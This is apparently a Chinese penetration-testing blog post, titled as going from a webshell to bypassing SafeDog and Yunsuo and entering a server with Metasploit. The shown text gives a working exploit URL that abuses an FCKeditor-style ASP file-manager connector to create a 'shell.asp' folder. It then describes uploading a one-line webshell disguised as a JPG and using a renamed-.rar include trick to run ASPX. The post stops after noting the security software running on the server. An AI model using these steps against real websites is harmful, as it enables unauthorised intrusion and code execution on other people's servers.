从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器
2020-3-1 15:42 作者:酷帥王子 | 黑盒网络渗透测试 |
http://www.xxoo.com/manage/hscxeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975
然后再给shell.asp目录上传一个jpg图片格式的一句话,然后用hatchet打开,然后看了一下支持aspx,那么我们就用包含的办法先把aspx后缀名改成.rar,然后再创建个111.ASPx,里面包含rar文件,进去以后看进程有云锁和安全狗,那么,那么我们慢慢来,慢慢来。 |
文章作者:酷帥王子
文章地址:https://www.2k8.org:443/post-144.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!
发表评论: